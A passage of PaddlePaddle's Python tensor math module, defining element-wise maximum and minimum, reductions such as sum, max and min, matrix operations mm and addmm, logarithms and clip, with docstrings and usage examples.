op_type = 'elementwise_mul'
act = None
axis = -1
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
if x.dtype != y.dtype:
raise TypeError(
'Input tensors must be same type, but received type of x: %s, type of y: %s '
% (x.dtype, y.dtype))
return _elementwise_op(LayerHelper(op_type, **locals()))
def maximum(x, y, name=None):
"""
Compare two tensors and returns a new tensor containing the element-wise maxima. The equation is:
.. math::
out = max(x, y)
**Note**:
``paddle.maximum`` supports broadcasting. If you want know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
y (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import numpy as np
import paddle
x = paddle.to_tensor([[1, 2], [7, 8]])
y = paddle.to_tensor([[3, 4], [5, 6]])
res = paddle.maximum(x, y)
print(res)
# [[3, 4],
# [7, 8]]
x = paddle.to_tensor([[1, 2, 3], [1, 2, 3]])
y = paddle.to_tensor([3, 0, 4])
res = paddle.maximum(x, y)
print(res)
# [[3, 2, 4],
# [3, 2, 4]]
x = paddle.to_tensor([2, 3, 5], dtype='float32')
y = paddle.to_tensor([1, np.nan, np.nan], dtype='float32')
res = paddle.maximum(x, y)
print(res)
# [ 2., nan, nan]
x = paddle.to_tensor([5, 3, np.inf], dtype='float32')
y = paddle.to_tensor([1, -np.inf, 5], dtype='float32')
res = paddle.maximum(x, y)
print(res)
# [ 5., 3., inf.]
"""
op_type = 'elementwise_max'
axis = -1
act = None
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
def minimum(x, y, name=None):
"""
Compare two tensors and returns a new tensor containing the element-wise minima. The equation is:
.. math::
out = min(x, y)
**Note**:
``paddle.minimum`` supports broadcasting. If you want know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
y (Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import numpy as np
import paddle
x = paddle.to_tensor([[1, 2], [7, 8]])
y = paddle.to_tensor([[3, 4], [5, 6]])
res = paddle.minimum(x, y)
print(res)
# [[1, 2],
# [5, 6]]
x = paddle.to_tensor([[[1, 2, 3], [1, 2, 3]]])
y = paddle.to_tensor([3, 0, 4])
res = paddle.minimum(x, y)
print(res)
# [[[1, 0, 3],
# [1, 0, 3]]]
x = paddle.to_tensor([2, 3, 5], dtype='float32')
y = paddle.to_tensor([1, np.nan, np.nan], dtype='float32')
res = paddle.minimum(x, y)
print(res)
# [ 1., nan, nan]
x = paddle.to_tensor([5, 3, np.inf], dtype='float64')
y = paddle.to_tensor([1, -np.inf, 5], dtype='float64')
res = paddle.minimum(x, y)
print(res)
# [ 1., -inf., 5.]
"""
op_type = 'elementwise_min'
axis = -1
act = None
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
for func in [
add,
multiply
]:
proto_dict = {'add': 'elementwise_add', 'multiply': 'elementwise_mul'}
op_proto = OpProtoHolder.instance().get_op_proto(proto_dict[func.__name__])
additional_args_lines = [
"name (string, optional): Name of the output. \
Default is None. It's used to print debug info for developers. Details: \
:ref:`api_guide_Name` "
]
func.__doc__ = _generate_doc_string_(
op_proto,
additional_args_lines=additional_args_lines,
skip_attrs_set={"x_data_format", "y_data_format", "axis",
"use_quantizer", "mkldnn_data_type", "Scale_x", "Scale_y", "Scale_out"
}) + """\n""" + str(func.__doc__)
def sum(x, axis=None, dtype=None, keepdim=False, name=None):
"""
Computes the sum of tensor elements over the given dimension.
Args:
x (Tensor): An N-D Tensor, the data type is bool, float16, float32, float64, int32 or int64.
axis (int|list|tuple, optional): The dimensions along which the sum is performed. If
:attr:`None`, sum all elements of :attr:`x` and return a
Tensor with a single element, otherwise must be in the
range :math:`[-rank(x), rank(x))`. If :math:`axis[i] < 0`,
the dimension to reduce is :math:`rank + axis[i]`.
dtype (str, optional): The dtype of output Tensor. The default value is None, the dtype
of output is the same as input Tensor `x`.
keepdim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result Tensor will have one fewer dimension
than the :attr:`x` unless :attr:`keepdim` is true, default
value is False.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: Results of summation operation on the specified axis of input Tensor `x`,
if `x.dtype='bool'`, `x.dtype='int32'`, it's data type is `'int64'`,
otherwise it's data type is the same as `x`.
Raises:
TypeError: The type of :attr:`axis` must be int, list or tuple.
Examples:
.. code-block:: python
import paddle
# x is a Tensor with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = paddle.to_tensor([[0.2, 0.3, 0.5, 0.9],
[0.1, 0.2, 0.6, 0.7]])
out1 = paddle.sum(x) # [3.5]
out2 = paddle.sum(x, axis=0) # [0.3, 0.5, 1.1, 1.6]
out3 = paddle.sum(x, axis=-1) # [1.9, 1.6]
out4 = paddle.sum(x, axis=1, keepdim=True) # [[1.9], [1.6]]
# y is a Tensor with shape [2, 2, 2] and elements as below:
# [[[1, 2], [3, 4]],
# [[5, 6], [7, 8]]]
# Each example is followed by the corresponding output tensor.
y = paddle.to_tensor([[[1, 2], [3, 4]],
[[5, 6], [7, 8]]])
out5 = paddle.sum(y, axis=[1, 2]) # [10, 26]
out6 = paddle.sum(y, axis=[0, 1]) # [16, 20]
# x is a Tensor with following elements:
# [[True, True, True, True]
# [False, False, False, False]]
# Each example is followed by the corresponding output tensor.
x = paddle.to_tensor([[True, True, True, True],
[False, False, False, False]])
out7 = paddle.sum(x) # [4]
out8 = paddle.sum(x, axis=0) # [1, 1, 1, 1]
out9 = paddle.sum(x, axis=1) # [4, 0]
"""
if axis is not None and not isinstance(axis, (list, tuple)):
axis = [axis]
if not axis:
reduce_all_flag = True
else:
if len(axis) == len(x.shape):
reduce_all_flag = True
else:
reduce_all_flag = False
def get_dtype(x, dtype):
if dtype is not None:
return (True, dtype)
src_type = convert_dtype(x.dtype)
if src_type in ['bool','int32', 'int64']:
return (True, 'int64')
return (False, src_type)
dtype_flag, dtype = get_dtype(x, dtype)
if in_dygraph_mode():
axis = axis if axis != None and axis != [] else [0]
if dtype_flag:
return _C_ops.reduce_sum(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all_flag, 'in_dtype',
x.dtype, 'out_dtype',
convert_np_dtype_to_dtype_(dtype))
else:
return _C_ops.reduce_sum(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all_flag)
attrs = {
'dim': axis if axis != None and axis != [] and axis != () else [0],
'keep_dim': keepdim,
'reduce_all': reduce_all_flag
}
if dtype_flag:
attrs.update({
'in_dtype': x.dtype,
'out_dtype': convert_np_dtype_to_dtype_(dtype)
})
check_variable_and_dtype(
x, 'x', ['bool', 'float16', 'float32', 'float64',
'int32', 'int64', 'complex64', 'complex128',
u'bool', u'float16', u'float32', u'float64',
u'int32', u'int64', u'complex64', u'complex128'], 'sum')
check_type(axis, 'axis', (int, list, tuple, type(None)), 'sum')
helper = LayerHelper('sum', **locals())
if dtype_flag:
out = helper.create_variable_for_type_inference(
dtype=convert_np_dtype_to_dtype_(dtype))
else:
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='reduce_sum',
inputs={'X': x},
outputs={'Out': out},
attrs=attrs)
return out
@templatedoc(op_type="sum")
def add_n(inputs, name=None):
"""
This OP is used to sum one or more Tensor of the input.
For example:
.. code-block:: text
Case 1:
Input:
input.shape = [2, 3]
input = [[1, 2, 3],
[4, 5, 6]]
Output:
output.shape = [2, 3]
output = [[1, 2, 3],
[4, 5, 6]]
Case 2:
Input:
First input:
input1.shape = [2, 3]
Input1 = [[1, 2, 3],
[4, 5, 6]]
The second input:
input2.shape = [2, 3]
input2 = [[7, 8, 9],
[10, 11, 12]]
Output:
output.shape = [2, 3]
output = [[8, 10, 12],
[14, 16, 18]]
Args:
inputs (Tensor|list[Tensor]|tuple[Tensor]): A Tensor or a list/tuple of Tensors. The shape and data type of the list/tuple elements should be consistent.
Input can be multi-dimensional Tensor, and data types can be: float32, float64, int32, int64.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor, the sum of input :math:`inputs` , its shape and data types are consistent with :math:`inputs`.
Examples:
.. code-block:: python
import paddle
input0 = paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32')
input1 = paddle.to_tensor([[7, 8, 9], [10, 11, 12]], dtype='float32')
output = paddle.add_n([input0, input1])
# [[8., 10., 12.],
# [14., 16., 18.]]
"""
if in_dygraph_mode():
if isinstance(inputs, Variable):
inputs = [inputs]
return _C_ops.sum(inputs, 'use_mkldnn', False)
helper = LayerHelper('add_n', **locals())
check_type(inputs, 'inputs', (Variable, tuple, list), 'add_n')
if isinstance(inputs, list) or isinstance(inputs, tuple):
if len(inputs) > 0:
for input in inputs:
check_variable_and_dtype(input, "inputs", \
['float32', 'float64', 'int32', 'int64'], 'add_n')
else:
check_variable_and_dtype(inputs, "inputs", \
['float32', 'float64', 'int32', 'int64'], 'add_n')
out = helper.create_variable_for_type_inference(
dtype=helper.input_dtype('inputs'))
helper.append_op(
type='sum',
inputs={'X': inputs},
outputs={'Out': out},
attrs={'use_mkldnn': False})
return out
def trunc(input, name=None):
'''
This API is used to returns a new tensor with the truncated integer values of input.
Args:
input (Tensor): The input tensor, it's data type should be int32, int64, float32, float64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor: The output Tensor of trunc.
Examples:
.. code-block:: python
import paddle
input = paddle.rand([2,2],'float32')
print(input)
# Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.02331470, 0.42374918],
# [0.79647720, 0.74970269]])
output = paddle.trunc(input)
print(output)
# Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0., 0.],
# [0., 0.]]))
'''
if in_dygraph_mode():
return _C_ops.trunc(input)
else:
inputs = {"X": input}
attrs = {}
helper = LayerHelper("trunc", **locals())
check_variable_and_dtype(input, 'X', ['int32', 'int64', 'float32', 'float64'], 'trunc')
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type="trunc", inputs=inputs, attrs=attrs, outputs={"Out": out})
return out
def mm(input, mat2, name=None):
"""
Applies matrix multiplication to two tensors.
Currently, the input tensors' rank can be any, but when the rank of any
inputs is bigger than 3, this two inputs' rank should be equal.
Also note that if the raw tensor :math:`x` or :math:`mat2` is rank-1 and
nontransposed, the prepended or appended dimension :math:`1` will be
removed after matrix multiplication.
Args:
input (Tensor): The input tensor which is a Tensor.
mat2 (Tensor): The input tensor which is a Tensor.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: The product Tensor.
Examples:
.. code-block:: python
import paddle
input = paddle.arange(1, 7).reshape((3, 2)).astype('float32')
mat2 = paddle.arange(1, 9).reshape((2, 4)).astype('float32')
out = paddle.mm(input, mat2)
print(out)
# [[11., 14., 17., 20.],
# [23., 30., 37., 44.],
# [35., 46., 57., 68.]])
"""
if in_dygraph_mode():
return _C_ops.matmul_v2(input, mat2)
def __check_input(x, y):
var_names = {'x': x, 'y': y}
for name, val in var_names.items():
check_variable_and_dtype(val, name,
['float16', 'float32', 'float64'], 'mm')
x_shape = list(x.shape)
y_shape = list(y.shape)
if len(x_shape) == 1:
x_shape = [1] + x_shape
if len(y_shape) == 1:
y_shape = y_shape + [1]
# check the inner 2 dimensions
if x_shape[-1] != y_shape[-2]:
if not ((x_shape[-1] == -1) or (y_shape[-2] == -1)):
raise ValueError(
"After performing an optional transpose, Input X's width should be "
"equal to Y's width for multiplication "
"prerequisites. But received X's shape: %s, Y's shape: %s\n"
% (x_shape, y_shape))
if len(y_shape) > 2 and len(x_shape) > 2:
for i, dim_x in enumerate(x_shape[:-2]):
# don't check neg shape
if dim_x < 0 or y_shape[i] < 0:
continue
if dim_x != y_shape[i]:
raise ValueError(
"When the matrix is larger than 2 dimensions, the higher "
"dimensional values of the two matrices need to be equal. "
"But received x_shape[%d] != y_shape[%d]. X's shape: %s, "
"Y's shape: %s.\n" % (i, i, x_shape, y_shape))
__check_input(input, mat2)
helper = LayerHelper('mm', **locals())
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='matmul_v2', inputs={'X': input,
'Y': mat2}, outputs={'Out': out})
return out
def addmm(input, x, y, beta=1.0, alpha=1.0, name=None):
"""
**addmm**
This operator is used to perform matrix multiplication for input $x$ and $y$.
$input$ is added to the final result.
The equation is:
.. math::
Out = alpha * x * y + beta * input
$Input$, $x$ and $y$ can carry the LoD (Level of Details) information, or not. But the output only shares the LoD information with input $input$.
Args:
input (Tensor): The input Tensor to be added to the final result.
x (Tensor): The first input Tensor for matrix multiplication.
y (Tensor): The second input Tensor for matrix multiplication.
beta (float): Coefficient of $input$.
alpha (float): Coefficient of $x*y$.
name (str, optional): Name of the output. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None.
Returns:
Tensor: The output Tensor of addmm op.
Examples:
.. code-block:: python
import paddle
x = paddle.ones([2,2])
y = paddle.ones([2,2])
input = paddle.ones([2,2])
out = paddle.addmm( input=input, x=x, y=y, beta=0.5, alpha=5.0 )
print(out)
# [[10.5 10.5]
# [10.5 10.5]]
"""
input_shape = input.shape
x_shape = x.shape
y_shape = y.shape
if not len(input_shape) == len(x_shape) == len(y_shape) == 2:
raise ValueError("The dimention of input, x, y should be 2 but receive input's shape: {}, x's shape: {}, y's shape: {}".format(input_shape, x_shape, y_shape))
if input_shape[0] != x_shape[0]:
if input_shape[0] != 1:
raise ValueError( "When x's dimension[0] is not equal with input's dimension[0], input's dimension[0] must be 1 but got {}".format(input_shape[0]))
if input_shape[1] != y_shape[1] and input_shape[1] != 1:
raise ValueError( "When y's dimension[1] is not equal with input's dimension[1], input's dimension[1] must be 1 but got {}".format(input_shape[1]))
if input_shape[1] != y_shape[1]:
if input_shape[1] != 1:
raise ValueError( "When y's dimension[1] is not equal with input's dimension[1], input's dimension[1] must be 1 but got {}".format(input_shape[1]))
if input_shape[0] != x_shape[0] and input_shape[0] != 1:
raise ValueError( "When x's dimension[0] is not equal with input's dimension[0], input's dimension[0] must be 1 but got {}".format(input_shape[0]))
if x_shape[1] != y_shape[0]:
raise ValueError("The input Variable x's width must be equal with Variable y' height. But received x's shape = {}, y's shape = {}.".format(x_shape, y_shape))
if in_dygraph_mode():
out = _C_ops.addmm(input, x, y, "Alpha", alpha, "Beta", beta)
return out
inputs = {'Input': input, "X": x, "Y": y}
attrs = {'Alpha': alpha, 'Beta': beta}
helper = LayerHelper("addmm", **locals())
check_variable_and_dtype(input, 'Input', ['float32', 'float64'], 'addmm')
check_variable_and_dtype(x, 'X', ['float32', 'float64'], 'addmm')
check_variable_and_dtype(y, 'Y', ['float32', 'float64'], 'addmm')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="addmm", inputs=inputs, attrs=attrs, outputs={"Out": out})
return out
def logsumexp(x, axis=None, keepdim=False, name=None):
r"""
This OP calculates the log of the sum of exponentials of ``x`` along ``axis`` .
.. math::
logsumexp(x) = \\log\\sum exp(x)
Args:
x (Tensor): The input Tensor with data type float32 or float64, which
have no more than 4 dimensions.
axis (int|list|tuple, optional): The axis along which to perform
logsumexp calculations. ``axis`` should be int, list(int) or
tuple(int). If ``axis`` is a list/tuple of dimension(s), logsumexp
is calculated along all element(s) of ``axis`` . ``axis`` or
element(s) of ``axis`` should be in range [-D, D), where D is the
dimensions of ``x`` . If ``axis`` or element(s) of ``axis`` is
less than 0, it works the same way as :math:`axis + D` . If
``axis`` is None, logsumexp is calculated along all elements of
``x``. Default is None.
keepdim (bool, optional): Whether to reserve the reduced dimension(s)
in the output Tensor. If ``keep_dim`` is True, the dimensions of
the output Tensor is the same as ``x`` except in the reduced
dimensions(it is of size 1 in this case). Otherwise, the shape of
the output Tensor is squeezed in ``axis`` . Default is False.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor, results of logsumexp along ``axis`` of ``x``, with the same data
type as ``x``.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[-1.5, 0., 2.], [3., 1.2, -2.4]])
out1 = paddle.logsumexp(x) # [3.4691226]
out2 = paddle.logsumexp(x, 1) # [2.15317821, 3.15684602]
"""
if isinstance(axis, int):
axis = [axis]
reduce_all = True if axis is None \
or len(axis)==0 \
or len(axis) == len(x.shape) else False
if axis is None or len(axis) == 0:
axis = [0]
if in_dygraph_mode():
return _C_ops.logsumexp(x, 'axis', axis, 'keepdim', keepdim, 'reduce_all', reduce_all)
check_variable_and_dtype(x, 'x',
['float32', 'float64'],
'logsumexp')
helper = LayerHelper('logsumexp', **locals())
attrs = {'axis': axis, 'keepdim': keepdim, 'reduce_all':reduce_all}
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='logsumexp', inputs={'X': x}, outputs={'Out': out}, attrs=attrs)
return out
def inverse(x, name=None):
"""
Takes the inverse of the square matrix. A square matrix is a matrix with
the same number of rows and columns. The input can be a square matrix
(2-D Tensor) or batches of square matrices.
Args:
x (Tensor): The input tensor. The last two
dimensions should be equal. When the number of dimensions is
greater than 2, it is treated as batches of square matrix. The data
type can be float32 and float64.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information,
please refer to :ref:`api_guide_Name`
Returns:
Tensor: A Tensor holds the inverse of x. The shape and data type
is the same as x.
Examples:
.. code-block:: python
import paddle
mat = paddle.to_tensor([[2, 0], [0, 2]], dtype='float32')
inv = paddle.inverse(mat)
print(inv) # [[0.5, 0], [0, 0.5]]
"""
if in_dygraph_mode():
return _C_ops.inverse(x)
def _check_input(x):
check_variable_and_dtype(x, 'x',
['float32', 'float64'], 'inverse')
if len(x.shape) < 2:
raise ValueError(
"The input of inverse is expected to be a Tensor whose number "
"of dimensions is no less than 2. But reviced: %d, "
"x's shape: %s." % (len(x.shape), x.shape))
_check_input(x)
helper = LayerHelper('inverse', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='inverse', inputs={'Input': [x] }, outputs={'Output': [out]})
return out
def max(x, axis=None, keepdim=False, name=None):
"""
Computes the maximum of tensor elements over the given axis.
Args:
x(Tensor): A tensor, the data type is float32,
float64, int32, int64.
axis(int|list|tuple, optional): The axis along which the maximum is computed.
If :attr:`None`, compute the maximum over all elements of
`x` and return a Tensor with a single element,
otherwise must be in the range :math:`[-x.ndim(x), x.ndim(x))`.
If :math:`axis[i] < 0`, the axis to reduce is :math:`x.ndim + axis[i]`.
keepdim(bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the `x` unless :attr:`keepdim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor, results of maximum on the specified axis of input tensor,
it's data type is the same as `x`.
Examples:
.. code-block:: python
import paddle
# data_x is a Tensor with shape [2, 4]
# the axis is a int element
x = paddle.to_tensor([[0.2, 0.3, 0.5, 0.9],
[0.1, 0.2, 0.6, 0.7]])
result1 = paddle.max(x)
print(result1)
#[0.9]
result2 = paddle.max(x, axis=0)
print(result2)
#[0.2 0.3 0.6 0.9]
result3 = paddle.max(x, axis=-1)
print(result3)
#[0.9 0.7]
result4 = paddle.max(x, axis=1, keepdim=True)
print(result4)
#[[0.9]
# [0.7]]
# data_y is a Tensor with shape [2, 2, 2]
# the axis is list
y = paddle.to_tensor([[[1.0, 2.0], [3.0, 4.0]],
[[5.0, 6.0], [7.0, 8.0]]])
result5 = paddle.max(y, axis=[1, 2])
print(result5)
#[4. 8.]
result6 = paddle.max(y, axis=[0, 1])
print(result6)
#[7. 8.]
"""
if axis is not None and not isinstance(axis, list):
if isinstance(axis, tuple):
axis = list(axis)
elif isinstance(axis, int):
axis= [axis]
else:
raise TypeError(
"The type of axis must be int, list or tuple, but received {}".format(type(axis)))
reduce_all = True if axis == None or axis == [] else False
axis = axis if axis != None and axis != [] else [0]
if in_dygraph_mode():
return _C_ops.reduce_max(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all)
helper = LayerHelper('max', **locals())
check_variable_and_dtype(
x, 'x', ['float32', 'float64', 'int32', 'int64'], 'max')
out = helper.create_variable_for_type_inference(
dtype=x.dtype)
helper.append_op(
type='reduce_max',
inputs={'X': x},
outputs={'Out': out},
attrs={
'dim': axis,
'keep_dim': keepdim,
'reduce_all': reduce_all
})
return out
def min(x, axis=None, keepdim=False, name=None):
"""
Computes the minimum of tensor elements over the given axis
Args:
x(Tensor): A tensor, the data type is float32, float64, int32, int64.
axis(int|list|tuple, optional): The axis along which the minimum is computed.
If :attr:`None`, compute the minimum over all elements of
`x` and return a Tensor with a single element,
otherwise must be in the range :math:`[-x.ndim, x.ndim)`.
If :math:`axis[i] < 0`, the axis to reduce is :math:`x.ndim + axis[i]`.
keepdim(bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result tensor will have one fewer dimension
than the `x` unless :attr:`keepdim` is true, default
value is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor, results of minimum on the specified axis of input tensor,
it's data type is the same as input's Tensor.
Examples:
.. code-block:: python
import paddle
# x is a tensor with shape [2, 4]
# the axis is a int element
x = paddle.to_tensor([[0.2, 0.3, 0.5, 0.9],
[0.1, 0.2, 0.6, 0.7]])
result1 = paddle.min(x)
print(result1)
#[0.1]
result2 = paddle.min(x, axis=0)
print(result2)
#[0.1 0.2 0.5 0.7]
result3 = paddle.min(x, axis=-1)
print(result3)
#[0.2 0.1]
result4 = paddle.min(x, axis=1, keepdim=True)
print(result4)
#[[0.2]
# [0.1]]
# y is a Tensor with shape [2, 2, 2]
# the axis is list
y = paddle.to_tensor([[[1.0, 2.0], [3.0, 4.0]],
[[5.0, 6.0], [7.0, 8.0]]])
result5 = paddle.min(y, axis=[1, 2])
print(result5)
#[1. 5.]
result6 = paddle.min(y, axis=[0, 1])
print(result6)
#[1. 2.]
"""
if axis is not None and not isinstance(axis, list):
if isinstance(axis, tuple):
axis = list(axis)
elif isinstance(axis, int):
axis= [axis]
else:
raise TypeError(
"The type of axis must be int, list or tuple, but received {}".format(type(axis)))
reduce_all = True if axis == None or axis == [] else False
axis = axis if axis != None and axis != [] else [0]
if in_dygraph_mode():
return _C_ops.reduce_min(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all)
helper = LayerHelper('min', **locals())
check_variable_and_dtype(
x, 'x', ['float32', 'float64', 'int32', 'int64'], 'min')
out = helper.create_variable_for_type_inference(
dtype=x.dtype)
helper.append_op(
type='reduce_min',
inputs={'X': x},
outputs={'Out': out},
attrs={
'dim': axis,
'keep_dim': keepdim,
'reduce_all': reduce_all
})
return out
def log1p(x, name=None):
r"""
Calculates the natural log of the given input tensor, element-wise.
.. math::
Out = \\ln(x+1)
Args:
x (Tensor): Input Tensor. Must be one of the following types: float32, float64.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor, the natural log of the input Tensor computed element-wise.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([[0], [1]], dtype='float32')
res = paddle.log1p(data)
# [[0.], [0.6931472]]
"""
if in_dygraph_mode():
return _C_ops.log1p(x)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], "log1p")
inputs = {'X': [x]}
helper = LayerHelper('log1p', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type="log1p", inputs={"X": x}, outputs={"Out": out})
return out
def log2(x, name=None):
r"""
Calculates the log to the base 2 of the given input tensor, element-wise.
.. math::
Out = \\log_2x
Args:
x (Tensor): Input tensor must be one of the following types: float32, float64.
name (str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: The log to the base 2 of the input Tensor computed element-wise.
Examples:
.. code-block:: python
import paddle
# example 1: x is a float
x_i = paddle.to_tensor([[1.0], [2.0]])
res = paddle.log2(x_i) # [[0.], [1.0]]
# example 2: x is float32
x_i = paddle.full(shape=[1], fill_value=2, dtype='float32')
paddle.to_tensor(x_i)
res = paddle.log2(x_i)
print(res) # [1.0]
# example 3: x is float64
x_i = paddle.full(shape=[1], fill_value=2, dtype='float64')
paddle.to_tensor(x_i)
res = paddle.log2(x_i)
print(res) # [1.0]
"""
if in_dygraph_mode():
return _C_ops.log2(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], "log2")
inputs = {'X': [x]}
helper = LayerHelper('log2', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type="log2", inputs={"X": x}, outputs={"Out": out})
return out
def log10(x, name=None):
r"""
Calculates the log to the base 10 of the given input tensor, element-wise.
.. math::
Out = \\log_10_x
Args:
x (Tensor): Input tensor must be one of the following types: float32, float64.
name (str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: The log to the base 10 of the input Tensor computed element-wise.
Examples:
.. code-block:: python
import paddle
# example 1: x is a float
x_i = paddle.to_tensor([[1.0], [10.0]])
res = paddle.log10(x_i) # [[0.], [1.0]]
# example 2: x is float32
x_i = paddle.full(shape=[1], fill_value=10, dtype='float32')
paddle.to_tensor(x_i)
res = paddle.log10(x_i)
print(res) # [1.0]
# example 3: x is float64
x_i = paddle.full(shape=[1], fill_value=10, dtype='float64')
paddle.to_tensor(x_i)
res = paddle.log10(x_i)
print(res) # [1.0]
"""
if in_dygraph_mode():
return _C_ops.log10(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], "log10")
inputs = {'X': [x]}
helper = LayerHelper('log10', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type="log10", inputs={"X": x}, outputs={"Out": out})
return out
def clip(x, min=None, max=None, name=None):
"""
This operator clip all elements in input into the range [ min, max ] and return
a resulting tensor as the following equation:
.. math::
Out = MIN(MAX(x, min), max)
Args:
x (Tensor): An N-D Tensor with data type float32, float64, int32 or int64.
min (float|int|Tensor): The lower bound with type ``float`` , ``int`` or a ``Tensor``
with shape [1] and type ``int32``, ``float32``, ``float64``.
max (float|int|Tensor): The upper bound with type ``float``, ``int`` or a ``Tensor``
with shape [1] and type ``int32``, ``float32``, ``float64``.
name (str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Tensor: A Tensor with the same data type and data shape as input.
Examples:
.. code-block:: python
import paddle
x1 = paddle.to_tensor([[1.2, 3.5], [4.5, 6.4]], 'float32')
out1 = paddle.clip(x1, min=3.5, max=5.0)
out2 = paddle.clip(x1, min=2.5)
print(out1)
# [[3.5, 3.5]
# [4.5, 5.0]]
print(out2)
# [[2.5, 3.5]
# [[4.5, 6.4]
"""
x_dtype = str(x.dtype)
if x_dtype == 'paddle.int32':
min_ = np.iinfo(np.int32).min
max_ = np.iinfo(np.int32).max - 2**7
elif x_dtype == 'paddle.int64':
min_ = np.iinfo(np.int64).min
max_ = np.iinfo(np.int64).max - 2**39
else:
min_ = float(np.finfo(np.float32).min)
max_ = float(np.finfo(np.float32).max)
if in_dygraph_mode():
if isinstance(min, Variable):
min = min.numpy().item(0)
if isinstance(max, Variable):
max = max.numpy().item(0)
min = min_ if min is None else min
max = max_ if max is None else max
return _C_ops.clip(x, "min", min, "max", max)
if min is not None:
check_type(min, 'min', (float, int, Variable), 'clip')
if isinstance(min, Variable):
check_dtype(min.dtype, 'min', ['float32', 'float64', 'int32'],
'clip', '(When the type of min in clip is Variable.)')
if max is not None:
check_type(max, 'max', (float, int, Variable), 'clip')
if isinstance(max, Variable):
check_dtype(max.dtype, 'max', ['float32', 'float64', 'int32'],
'clip', '(When the type of max in clip is Variable.)')
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'], 'clip')
inputs = {'X': x}
attrs = {'min': min_, 'max': max_}
if isinstance(min, Variable):
min.stop_gradient = True
inputs['Min'] = min
elif min is not None:
attrs['min'] = min
if isinstance(max, Variable):
max.stop_gradient = True
inputs['Max'] = max
elif max is not None:
attrs['max'] = max
helper = LayerHelper('clip', **locals())
output = helper.create_variable_for_type_inference(
dtype=helper.input_dtype('x'))
helper.append_op(
type='clip', inputs=inputs, outputs={'Out': [output]}, attrs=attrs)
return output
@inplace_apis_in_dygraph_only
def clip_(x, min=None, max=None, name=None):
"""
Inplace version of ``clip`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_clip`.
"""
fmin = float(np.finfo(np.float32).min)
